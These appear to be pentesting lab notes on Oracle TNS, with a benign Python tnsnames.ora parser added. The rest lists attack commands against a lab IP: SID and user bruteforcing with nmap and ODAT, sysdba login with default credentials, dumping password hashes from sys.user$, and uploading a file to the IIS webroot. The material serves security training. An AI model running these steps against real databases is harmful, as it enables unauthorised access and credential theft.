Oracle TNS
Port: TCP/1521
The TNS listener can be configured to support various network protocols, including TCP/IP, UDP, IPX/SPX, and AppleTalk.
The configuration files for Oracle TNS are called tnsnames.ora and listener.ora and are typically located in the $ORACLE_HOME/network/admin directory.
Oracle 9 has a default password, CHANGE_ON_INSTALL, whereas Oracle 10 has no default password set.
The Oracle DBSNMP service also uses a default password, dbsnmp.
Each database or service has a unique entry in the tnsnames.ora file.
In Oracle RDBMS, a System Identifier (SID) is a unique name that identifies a particular database instance.
SIDs are an essential part of the connection process, as they identify the specific database instance the client wants to connect to.
There are various ways to enumerate, or more accurately guess, SIDs, using tools such as nmap, hydra, odat, and others.
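The tnsnames.ora entries mentioned above use Oracle's nested parenthesised key/value syntax. The following parser is an added example (not part of the original notes, and not ODAT or Oracle code) that reads that format and reports, per alias, the HOST/PORT pairs and the SID or SERVICE_NAME each entry points at; this is useful for inventorying which instances a client is configured to reach. The sample file content is constructed for the example.

```python
import re

# Constructed sample tnsnames.ora content (not taken from any real system).
SAMPLE_TNSNAMES = """
# comment lines start with '#'
XE =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = 10.0.0.5)(PORT = 1521))
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = XE)
    )
  )

LEGACY.example.com =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = db1.example.com)(PORT = 1521))
      (ADDRESS = (PROTOCOL = TCP)(HOST = db2.example.com)(PORT = 1522))
    )
    (CONNECT_DATA = (SID = LEGACY))
  )
"""


def tokenize(text):
    """Drop '#' comments and split into '(', ')', '=' and bare words."""
    text = re.sub(r"#.*", "", text)
    return re.findall(r"\(|\)|=|[^\s()=]+", text)


def _expect(tokens, i, tok):
    if i >= len(tokens) or tokens[i] != tok:
        raise ValueError(f"expected {tok!r} at token {i}")
    return i + 1


def parse_value(tokens, i):
    """Parse what follows '='. Returns (value, next_index).

    A value is either a scalar word or a list of (KEY, value) pairs,
    one pair per '( KEY = value )' group.
    """
    if i < len(tokens) and tokens[i] == "(":
        children = []
        while i < len(tokens) and tokens[i] == "(":
            key = tokens[i + 1]
            j = _expect(tokens, i + 2, "=")
            val, j = parse_value(tokens, j)
            i = _expect(tokens, j, ")")
            children.append((key.upper(), val))
        return children, i
    if i >= len(tokens):
        raise ValueError("unexpected end of input")
    return tokens[i], i + 1


def parse_tnsnames(text):
    """Return {ALIAS: tree} for every top-level entry in the file."""
    tokens = tokenize(text)
    entries = {}
    i = 0
    while i < len(tokens):
        alias = tokens[i]
        j = _expect(tokens, i + 1, "=")
        val, i = parse_value(tokens, j)
        entries[alias.upper()] = val
    return entries


def find_nodes(node, key):
    """Yield every value stored under `key` anywhere below `node`."""
    if isinstance(node, list):
        for k, v in node:
            if k == key:
                yield v
            yield from find_nodes(v, key)


def summarize(entries):
    """Per alias: list of (HOST, PORT) and the SID / SERVICE_NAME, if any."""
    summary = {}
    for alias, tree in entries.items():
        addresses = []
        for addr in find_nodes(tree, "ADDRESS"):
            if isinstance(addr, list):  # skip malformed scalar ADDRESS values
                fields = dict(addr)
                addresses.append((fields.get("HOST"), fields.get("PORT")))
        summary[alias] = {
            "addresses": addresses,
            "sid": next(find_nodes(tree, "SID"), None),
            "service_name": next(find_nodes(tree, "SERVICE_NAME"), None),
        }
    return summary


if __name__ == "__main__":
    for alias, info in summarize(parse_tnsnames(SAMPLE_TNSNAMES)).items():
        print(alias, info)
```

Point it at a real file with `parse_tnsnames(open(path).read())`; entries using ADDRESS_LIST with several addresses come back with one (HOST, PORT) pair per address, and an entry that uses SID instead of SERVICE_NAME reports the other field as None.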
Tools
If not installed, see Pentesting Machine.
./odat.py -h
Nmap - SID Bruteforcing
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

ODAT - More information, user bruteforcing included
./odat.py all -s 10.129.204.235

SQLplus - Log In
sqlplus <username>/<password>@<IP>/<SID>
select table_name from all_tables;
select * from user_role_privs;

Database Enumeration
It is possible to try known credentials to connect as the System Database Administrator (sysdba):
sqlplus scott/tiger@10.129.204.235/XE as sysdba

Then list the current user's privileges:
select * from user_role_privs;

From this point, we could retrieve the password hashes from sys.user$ and try to crack them offline:
select name, password from sys.user$;

Oracle RDBMS - File Upload
echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt
curl -X GET http://10.129.204.235/testing.txt